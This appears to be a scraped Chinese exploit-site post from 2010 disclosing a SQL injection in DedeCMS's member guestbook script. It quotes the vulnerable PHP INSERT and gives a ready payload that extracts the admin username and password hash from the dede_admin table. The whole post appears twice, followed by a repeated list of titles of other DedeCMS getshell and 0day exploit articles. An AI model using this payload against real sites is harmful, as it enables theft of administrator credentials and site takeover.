发布日期:2010-03-08
发布作者: jackal
漏洞描述:
member_guestbook_action.php
$title = cn_substr(html2text($title),60); $msg = cn_substr(stripslashes($msg),2048); if($cfg_ml->M_UserName!="" && $cfg_ml->M_ID!=$uidnum) $gid = $cfg_ml->M_UserName; else $gid = ''; $inquery = " INSERT INTO dede_member_guestbook(mid,gid,title,msg,uname,email,qq,tel,ip,dtime) VALUES ('$uidnum','$gid','$title','$msg','$uname','$email','$qq','$tel','".GetIP()."',".mytime()."); "; 一般的注射..
cn_substr在别处有别的错.这里无所谓了.
漏洞测试:
cccccc',(select concat(userid,0x3a,pwd) from dede_admin limit 0,1),'','','','123',123)#
发布作者: jackal
漏洞描述:
member_guestbook_action.php
$title = cn_substr(html2text($title),60); $msg = cn_substr(stripslashes($msg),2048); if($cfg_ml->M_UserName!="" && $cfg_ml->M_ID!=$uidnum) $gid = $cfg_ml->M_UserName; else $gid = ''; $inquery = " INSERT INTO dede_member_guestbook(mid,gid,title,msg,uname,email,qq,tel,ip,dtime) VALUES ('$uidnum','$gid','$title','$msg','$uname','$email','$qq','$tel','".GetIP()."',".mytime()."); "; 一般的注射..
cn_substr在别处有别的错.这里无所谓了.
漏洞测试:
cccccc',(select concat(userid,0x3a,pwd) from dede_admin limit 0,1),'','','','123',123)#
只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27864, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35445, 评论: 0)
dedecms默认的注册用户 (浏览: 12968, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13760, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16390, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37600, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22240, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11172, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10279, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 18107, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35445, 评论: 0)
dedecms默认的注册用户 (浏览: 12968, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13760, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16390, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37600, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22240, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11172, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10279, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 18107, 评论: 0)